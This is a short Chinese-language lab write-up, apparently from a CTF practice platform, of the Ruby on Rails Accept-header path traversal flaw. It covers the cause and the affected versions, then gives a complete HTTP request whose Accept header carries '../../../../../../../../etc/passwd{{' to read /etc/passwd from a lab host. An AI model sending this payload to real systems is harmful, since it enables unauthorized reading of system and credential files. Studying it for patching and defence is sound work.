漏洞描述

Ruby on Rails是一个 Web 应用程序框架,是一个相对较新的 Web 应用程序框架，构建在 Ruby 语言之上。它被宣传为现有企业框架的一个替代，而它的目标，就是让 Web 开发方面的生活，变得更轻松。在控制器中通过render file形式来渲染应用之外的视图，且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{头来构成构造路径穿越漏洞，读取任意文件。
https://www.freebuf.com/news/199617.html

漏洞影响

Ruby on Rails < 6.0.0.beta3
Ruby on Rails < 5.2.2.1
Ruby on Rails < 5.1.6.2
Ruby on Rails < 5.0.7.2

漏洞复现

正常访问http://node3.buuoj.cn:26318/robots，看到正常的robots.txt文件被读取出来。

抓包然后利用漏洞，发送如下数据包，读取/etc/passwd

GET /robots HTTP/1.1
Host: node3.buuoj.cn:26318
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept:../../../../../../../../etc/passwd{{
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: UM_distinctid=1785a4ff130456-0f22e64e92af97-4c3f227c-1fa400-1785a4ff131385; qSq_visitedfid=2; SESS95551f5ddaecb47376c20fedfc2d68a8=mqBaxWNzEDU58O5cN_rzfbqaJfPK0Lhjz130wXd_IIU; Drupal.toolbar.collapsed=0; _blog_session=zQn3GuUS6FuUDFOpZ%2FBYdZIDDhLmdATzJncf1YiGtdAU2do96VZ1hFsWO8a6HUAEUvaQ2fN4%2FmSMtGbad44EBS4oGYQepZX1M1ZxGoNkA7qUtmTwT1JKEl8ghXZCXpEqQdaDtCuCMxFvWZV7Kxo%3D--%2FrVvjt4BRBHRDloM--h3D1rLrPP8yhU%2FbYiazoAQ%3D%3D
Upgrade-Insecure-Requests: 1
If-None-Match: W/"d0f5e23d446407dcb86942663b29a1a3"
Cache-Control: max-age=0

成功读取到/etc/passwd